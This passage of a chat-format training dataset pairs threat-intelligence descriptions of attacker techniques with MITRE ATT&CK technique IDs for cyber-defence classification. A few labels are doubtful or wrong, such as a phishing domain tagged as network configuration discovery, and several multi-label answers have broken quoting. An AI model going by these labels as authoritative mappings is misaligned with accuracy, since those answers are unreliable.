MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "2 Successful payload download Astaroth’s initial payload is a malicious .lnk file, a common delivery method used by threat actors" }, { "role": "assistant", "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Operation Wocao has used Impacket's smbexec.py as well as accessing the C$ and IPC$ shares to move laterally." }, { "role": "assistant", "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The document may also display the fake message “This document is protected” to entice users to enable content and execute malicious code. The .docx file contained embedded x86 and x64 versions of the payload DLL so that the appropriate version was dropped depending on the target operating system" }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "conducts brute force attacks against SSH services to gain initial access." }, { "role": "assistant", "content": "T1110 - Brute Force" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sandworm Team has used port 6789 to accept connections on the group's SSH server." }, { "role": "assistant", "content": "T1571 - Non-Standard Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "For readers unaware of ngrok, this site is a simple reverse proxy used to let Internet-based users connect to servers located behind firewalls or on local machines that don't have a public IP address" }, { "role": "assistant", "content": "T1090 - Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Fox Kitten has accessed victim security and IT environments and Microsoft Teams to mine valuable information." }, { "role": "assistant", "content": "T1213 - Data from Information Repositories" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PoisonIvy creates a backdoor through which remote attackers can upload files." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Stealth Falcon malware creates a scheduled task entitled “IE Web Cache” to execute a malicious file hourly." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "1) These lure documents attempt to exploit the Microsoft Office Dynamic Data Exchange (DDE) protocol in order to gain access to victim machines. 2) Once the Gallmaker attackers gain access to a device, they execute various tools, including" }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File', 'T1559.002 - Inter-Process Communication: Dynamic Data Exchange" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "chinapolicyanalysis.org 185.130.212.168 Domain used for spear phish sender e-mail address and to host malicious documents" }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kimsuky can gather a list of all processes running on a victim's machine." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Several malware samples use a common function to identify target files by their extension. malware families can also enumerate files and directories, including a Destover-like variant that lists files and gathers information for all drives." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has a module to clear event logs with PowerShell." }, { "role": "assistant", "content": "T1070 - Indicator Removal on Host" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Chinese state-sponsored cyber actors have been observed using commands, including tasklist, jobs, ps, or taskmgr, to reveal the running processes on victim devices." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TrickBot collects the users of the system." }, { "role": "assistant", "content": "T1087.001 - Account Discovery: Local Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used regsvr32.exe to execute a server variant of in victim networks." }, { "role": "assistant", "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Green Lambert can delete the original executable after initial installation in addition to unused functions." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can overwrite Registry settings to reduce its visibility on the victim." }, { "role": "assistant", "content": "T1070 - Indicator Removal on Host" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Post-compromise, APT39 leverages custom backdoors such as SEAWEED, CACHEMONEY, and a unique variant of POWBAT to establish a foothold in a target environment. Internal reconnaissance has been performed using custom scripts and both freely available and custom tools such as the port scanner, BLUETORCH" }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter', 'T1046 - Network Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "is capable of opening a command terminal." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TrickBot uses brute-force attack against RDP with rdpscanDll module." }, { "role": "assistant", "content": "T1110.004 - Brute Force: Credential Stuffing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Domains The RoyalCli backdoor was attempting to communicate to the following domains: News.memozilla[.]org video.memozilla[.]org The BS2005 backdoor utilised the following domains for C2: Run.linodepower[.]com Singa.linodepower[.]com log.autocount[.]org RoyalDNS backdoor was seen communicating to the domain: andspurs[.]com Possible linked APT15 domains include: Micakiz.wikaba[.]org cavanic9[.]net ridingduck[.]com zipcodeterm[.]com dnsapp[.]info Published date:  10 March 2018 Written by:  Rob Smallridge" }, { "role": "assistant", "content": "T1008 - Fallback Channels" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "jRAT has the capability to take screenshots of the victim’s machine." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses Domain Fronting to disguise the destination of network traffic as another server that is hosted in the same Content Delivery Network (CDN) as the intended desitnation." }, { "role": "assistant", "content": "T1090.004 - Domain Fronting" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can be added as a service to establish persistence." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Emotet has used cmd.exe to run a PowerShell script." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter', 'T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Threat Group-3390 has packed malware and tools." }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mustang Panda has gathered system information using \"systeminfo\"." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TEMP.Veles utilized RDP throughout an operation." }, { "role": "assistant", "content": "T1021.001 - Remote Services: Remote Desktop Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "packs a plugin with UPX." }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Milan can use `cmd.exe` for discovery actions on a targeted system." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The sample, in the form of an RTF document, exploited CVE-2016-4117 to download and install a program from a remote C&C server" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "sqlmap can be used to automate exploitation of SQL injection vulnerabilities." }, { "role": "assistant", "content": "T1190 - Exploit Public-Facing Application" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ke3chang performs discovery of permission groups \"net group /domain\"." }, { "role": "assistant", "content": "T1069.002 - Permission Groups Discovery: Domain Groups" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Agent Tesla can log keystrokes on the victim’s machine." }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "IndigoZebra has established domains, some of which were designed to look like official government domains, for their operations." }, { "role": "assistant", "content": "T1583.001 - Domains" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lokibot has obfuscated strings with base64 encoding." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "achieves persistence by creating a shortcut to itself in the CSIDL_STARTUP directory." }, { "role": "assistant", "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "secretsdump.py: Performs various techniques to dump secrets from the remote machine without executing any agent there. For DIT files, we dump NTLM hashes, Plaintext credentials (if available) and Kerberos keys using the DL_DRSGetNCChanges() method. It can also dump NTDS.dit via vssadmin executed with the smbexec/wmiexec approach. mimikatz.py: Mini shell to control a remote mimikatz RPC server developed by @gentilkiwi" }, { "role": "assistant", "content": "T1003.004 - OS Credential Dumping: LSA Secrets', 'T1003.002 - OS Credential Dumping: Security Account Manager', 'T1003.003 - OS Credential Dumping: NTDS', 'T1003.001 - OS Credential Dumping: LSASS Memory" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Confucius has sent malicious links to victims through email campaigns." }, { "role": "assistant", "content": "T1566.002 - Phishing: Spearphishing Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "actors used compromised credentials for the victim's endpoint management platform, Altiris, to move laterally." }, { "role": "assistant", "content": "T1078 - Valid Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ability to disable Microsoft Office Protected View (as shown in Figure 15) by setting the following keys in the Windows Registry: DisableAttachmentsInPV DisableInternetFilesInPV DisableUnsafeLocationsInPV Figure 15: Disabling Microsoft Office Protected View Ability to remotely reboot or shut down or clean the system based on the command received from the C2 server, as shown in Figure 16" }, { "role": "assistant", "content": "T1562.001 - Impair Defenses: Disable or Modify Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "collects OS version information such as registered owner details, manufacturer details, processor type, available storage, installed patches, hostname, version info, system date, and other system information by using the commands systeminfo, net config workstation, hostname, ver, set, and date /t." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During C0015, the threat actors obtained files and data from the compromised network." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kimsuky has modified Registry settings for default file associations to enable all macros and for persistence." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Impersonation using Kerberos pass-the-ticket attacks (Mimikatz PowerShell) - Email extraction from the MS Exchange Server using compromised credentials - Archiving sensitive information - Data exfiltration via legitimate cloud services - Secure file deletion" }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell', 'T1550.003 - Use Alternate Authentication Material: Pass the Ticket', 'T1114.002 - Email Collection: Remote Email Collection', 'T1078 - Valid Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Earth Lusca has used `mshta.exe` to load an HTA script within a malicious .LNK file." }, { "role": "assistant", "content": "T1218.005 - Signed Binary Proxy Execution: Mshta" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "creates a backdoor through which remote attackers can change the frequency at which compromised hosts contact remote C2 infrastructure." }, { "role": "assistant", "content": "T1029 - Scheduled Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Agent Tesla has used wmi queries to gather information from the system." }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "NanoCore can modify the victim's firewall." }, { "role": "assistant", "content": "T1562.004 - Impair Defenses: Disable or Modify System Firewall" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Penquin can use Cron to create periodic and pre-scheduled background jobs." }, { "role": "assistant", "content": "T1053.003 - Scheduled Task/Job: Cron" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SMOKEDHAM has created user accounts and added them to local Admin groups." }, { "role": "assistant", "content": "T1136.001 - Create Account: Local Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RedLeaves can delete specified files." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The role of Torisma is to monitor for new drives added to the system as well as remote desktop connections. This appears to be a more specialized implant focused on active monitoring on a victim’s system and triggering the execution of payloads based on monitored events. The end objective of Torisma is executing shellcode on the victim’s system and sending the results back to the C2" }, { "role": "assistant", "content": "T1049 - System Network Connections Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dridex has collected a list of installed software on the system." }, { "role": "assistant", "content": "T1518 - Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This is encrypted by RC4, using the key {0xb5, 0x78, 0x62, 0x52, 0x98, 0x3e, 0x24, 0xd7, 0x3b, 0xc6, 0xee, 0x7c, 0xb9, 0xed, 0x91, 0x62}" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "menuPass has used the Microsoft administration tool csvde.exe to export Active Directory data." }, { "role": "assistant", "content": "T1087.002 - Account Discovery: Domain Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lizar can collect the computer name from the machine,." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The file destruction algorithm is composed of two stages: a first stage to overwrite files and another to destroy the physical disk layout and the partition tables along with it. For the file destruction, it takes ownership of the files by modifying their ACL entries after it has obtained the 'SeTakeOwnershipPrivilege'. A file found will then simply be overwritten with zeros. This is done for the next 23 drives alphabetically (through \"Z:\\\"). On the second stage, the wiper attempts to set the drive layout of all the physical drives on the system numbered 9 to 0. This will wipe out all extended information about the physical drive's partitions including MBR, GPT and partition entries. Destroying the start of the files and the partitions tables is a common technique seen on other wipers, and its highly effective in preventing the file recovery" }, { "role": "assistant", "content": "T1561.002 - Disk Structure Wipe" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Machete stores files and logs in a folder on the local drive." }, { "role": "assistant", "content": "T1074.001 - Data Staged: Local Data Staging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "1) Suckfly's first step was to identify a user to target so the attackers could attempt their initial breach into the e-commerce company's internal network. We don't have hard evidence of how Suckfly obtained information on the targeted user, but we did find a large open-source presence on the initial target. 2) On April 22, 2015, Suckfly exploited a vulnerability on the targeted employee's operating system (Windows) that allowed the attackers to bypass the User Account Control and install the Nidiran back door to provide access for their attack. While we know the attackers used a custom dropper to install the back door, we do not know the delivery vector. Based on the amount of open-source information available on the target, it is feasible that a spear-phishing email may have been used. We found evidence that Suckfly used hacktools to move latterly and escalate privileges. To do this the attackers used a signed credential-dumping tool to obtain the victim's account credentials. With the account credentials, the attackers were able to access the victim's account and navigate the internal corporate network as though they were the employee. 5) The attackers’ final step was to exfiltrate data off the victim’s network and onto Suckfly’s infrastructure. While we know that the attackers used the Nidiran back door to steal information about the compromised organization, we do not know if Suckfly was successful in stealing other information" }, { "role": "assistant", "content": "T1003 - OS Credential Dumping" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LightNeuron uses SMTP for C2." }, { "role": "assistant", "content": "T1071.003 - Mail Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "We mentioned earlier that due to the nature of the IE injection technique used by the HTTP-based backdoors, a number of C2 commands were cached to disk" }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RATANKBA performs a reflective DLL injection using a given pid." }, { "role": "assistant", "content": "T1055.001 - Process Injection: Dynamic-link Library Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MarkiRAT can download additional files and tools from its C2 server, including through the use of BITSAdmin." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Indrik Spider has downloaded additional scripts, malware, and tools onto a compromised host." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Falcon Intelligence has observed two different methods used to deploy BitPaymer once the domain controllers are compromised. In one instance, only the domain controllers and other critical infrastructure, like payroll servers, were targeted and PowerShell Empire was used to download and execute the BitPaymer malware directly on these servers" }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TeamTNT has replaced .dockerd and .dockerenv with their own scripts and cryptocurrency mining software." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses Twitter as a backup C2 method. It also has a module designed to post messages to the Russian VKontakte social media site." }, { "role": "assistant", "content": "T1102 - Web Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "\"beacon\" payload can receive C2 from one protocol and respond on another. This is typically a mixture of HTTP, HTTPS, and DNS traffic." }, { "role": "assistant", "content": "T1026 - Multiband Communication" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "KillDisk deletes Application, Security, Setup, and System Windows Event Logs." }, { "role": "assistant", "content": "T1070.001 - Indicator Removal on Host: Clear Windows Event Logs" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FinFisher uses DLL side-loading to load malicious programs." }, { "role": "assistant", "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "UNC2452 modified timestamps of backdoors to match legitimate Windows files." }, { "role": "assistant", "content": "T1070.006 - Indicator Removal on Host: Timestomp" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Although the targeting profile is the same as the Russian banking cluster, the TTPs are very different. In particular, the use of tooling stands out from other clusters of CARBON SPIDER activity. As with other clusters, the primary infection vector is targeted spear phishing emails that use exploits for a variety of vulnerabilities in Microsoft Office:" }, { "role": "assistant", "content": "T1203 - Exploitation for Client Execution', 'T1588.006 - Vulnerabilities', 'T1566 - Phishing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses to clean up the environment and attempt to prevent detection." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A JPIN variant downloads the backdoor payload via the BITS service." }, { "role": "assistant", "content": "T1197 - BITS Jobs" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Saint Bot has been packed using a dark market crypter." }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The usage of LinkedIn to deliver malicious documents," }, { "role": "assistant", "content": "T1566.003 - Spearphishing via Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Configuration Config.ini is the file where the malware stores its encrypted configuration data" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FELIXROOT uses HTTP and HTTPS to communicate with the C2 server." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used HTTP for C2." }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RDAT can deobfuscate the base64-encoded and AES-encrypted files downloaded from the C2 server." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "REvil can mark its binary code for deletion after reboot." }, { "role": "assistant", "content": 